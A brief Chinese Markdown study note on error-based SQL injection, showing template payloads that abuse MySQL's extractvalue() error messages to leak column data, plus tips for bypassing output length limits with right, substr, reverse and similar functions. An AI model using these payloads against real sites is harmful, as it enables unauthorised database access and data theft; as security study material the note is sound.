报错注入.md
利用某些sql
函数出错时回显错误信息包含参数值的特性,获得需要的信息
...^extractvalue(1,concat(0x5c,<payload>))
e.g.
...^extractvalue(1,concat(0x5c,(select(<columns>)from(<table_name>))))
对于回显有字数上限的使用right
函数包裹<columns>
,以获得后半部分
...^extractvalue(1,concat(0x5c,(select(right(<columns>))from(<table_name>))))
也可以使用reverse
、substr
、mid
、regexp
这些,总之灵活运用QwQ
#Web #SQL注入 #报错注入